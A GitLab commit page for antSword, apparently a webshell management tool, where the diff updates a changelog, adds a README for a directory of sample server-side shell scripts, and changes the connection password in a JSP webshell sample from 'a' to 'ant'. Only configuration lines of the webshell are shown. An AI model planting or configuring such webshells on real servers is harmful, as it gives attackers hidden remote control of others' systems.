Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
A
antSword
Project
Project
Details
Activity
Releases
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
HuangJunbo
antSword
Commits
2ee1e9d5
Commit
2ee1e9d5
authored
Mar 26, 2016
by
antoor
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
修改一些细节
parent
888430a2
Changes
3
Hide whitespace changes
Inline
Side-by-side
Showing
3 changed files
with
4 additions
and
2 deletions
+4
-2
CHANGELOG.md
CHANGELOG.md
+1
-1
README.md
shells/README.md
+2
-0
custom.jsp
shells/custom.jsp
+1
-1
No files found.
CHANGELOG.md
View file @
2ee1e9d5
...
...
@@ -6,7 +6,7 @@
### /26
1.
文件管理双击:size < 100kb ? 编辑 : 下载
2.
调整 Custom 方式数据库部分代码
2.
调整 Custom 方式数据库部分代码
// 2-4:感谢
[
@Medicean
](
https://github.com/Medicean
)
3.
添加 Shells 目录, 用于存放 shell 样本代码
4.
添加
`custom.jsp`
服务端样本代码
...
...
shells/README.md
0 → 100644
View file @
2ee1e9d5
## Shell-Scripts
> 此目录用于存放一些示例的服务端脚本文件,仅供参考。
\ No newline at end of file
shells/custom.jsp
View file @
2ee1e9d5
...
...
@@ -9,7 +9,7 @@
* 2. mysql 数据库支持
* 3. 支持 base64 和 hex 编码
**/
String
Pwd
=
"a"
;
//连接密码
String
Pwd
=
"a
nt
"
;
//连接密码
String
encoder
=
"base64"
;
// 数据编码
//String encoder = "hex";
String
cs
=
"UTF-8"
;
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment